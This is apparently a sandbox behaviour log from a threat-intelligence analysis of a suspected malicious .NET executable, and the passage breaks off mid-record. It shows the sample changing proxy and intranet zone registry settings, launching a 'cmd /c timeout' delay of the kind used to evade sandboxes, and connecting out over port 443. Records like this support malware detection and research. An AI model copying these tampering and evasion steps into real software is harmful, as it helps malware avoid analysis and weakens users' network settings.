样本分析 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb
https://s.threatbook.com/report/file/99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb
09:07:41:671, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_create, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' image_base:0x0000000000610000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ], 09:07:41:686, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux, offset:0x00000000 datalen:0x000000B0 , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x0000000071D60000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, 
C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux, offset:0x00000000 datalen:0x0000026C , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000071270000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux, offset:0x00000000 datalen:0x00000360 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux, offset:0x00000000 datalen:0x00000384 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000070A50000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 
99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000070940000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux, offset:0x00000000 datalen:0x000002EC , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x000000006E430000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, 
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Desktop\desktop.ini, offset:0x00000000 datalen:0x0000011C , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Documents\desktop.ini, offset:0x00000000 datalen:0x00000194 , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Music\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 
99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Pictures\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Videos\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Downloads\desktop.ini, offset:0x00000000 datalen:0x0000011C , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\OneDrive\desktop.ini, offset:0x00000000 datalen:0x00000064 , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, 
HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:858, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Windows\SysWOW64\cmd.exe, offset:0x00000000 datalen:0x00039A00 , 0x00000000 [操作成功完成。 ], 09:07:41:858, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, PROC_exec, C:\Windows\SysWOW64\cmd.exe, target_pid:6308 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, 
C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:5100, 4092, FILE_read, C:\Windows\System32\conhost.exe, offset:0x00000000 datalen:0x000C8C00 , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:0, 4092, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:6580 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:5100, 4092, REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'C9 2F 5F 60 DE DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:0, 4092, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6131A0000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:5780, 4092, FILE_read, C:\Windows\Prefetch\CONHOST.EXE-0C6456FB.pf, offset:0x00000000 datalen:0x00001E40 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\conhost.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msvcp_win.dll, 
attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ucrtbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\combase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\bcryptprimitives.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\advapi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\sechost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\gdi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\gdi32full.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\imm32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\Conhost.exe.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 
09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\shell32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\cfgmgr32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\windows.storage.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\profapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\powrprof.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\shlwapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\cryptsp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\user32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msctf.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\oleaut32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ole32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:921, conhost.exe, 6580:7656, 4092, FILE_read, C:\Windows\Fonts\StaticCache.dat, offset:0x00000000 datalen:0x0000003C , 0x00000000 [操作成功完成。 ], 
09:07:41:936, conhost.exe, 6580:0, 4092, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFA14440000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:07:41:936, cmd.exe, 6308:5100, 4092, FILE_read, C:\Windows\SysWOW64\timeout.exe, offset:0x00000000 datalen:0x00006200 , 0x00000000 [操作成功完成。 ], 09:07:41:936, cmd.exe, 6308:0, 4092, PROC_exec, C:\Windows\SysWOW64\timeout.exe, target_pid:8672 cmdline:'timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ], 09:07:41:968, timeout.exe, 8672:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:968, cmd.exe, 6308:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:968, conhost.exe, 6580:0, 4092, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux, 
offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:42:046, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x000000006FF10000 size:0x0008E000 , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 
99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:608, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, NET_connect, 104.18.19.73:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:43:641, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, NET_connect, 104.18.18.73:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll, offset:0x00000000 
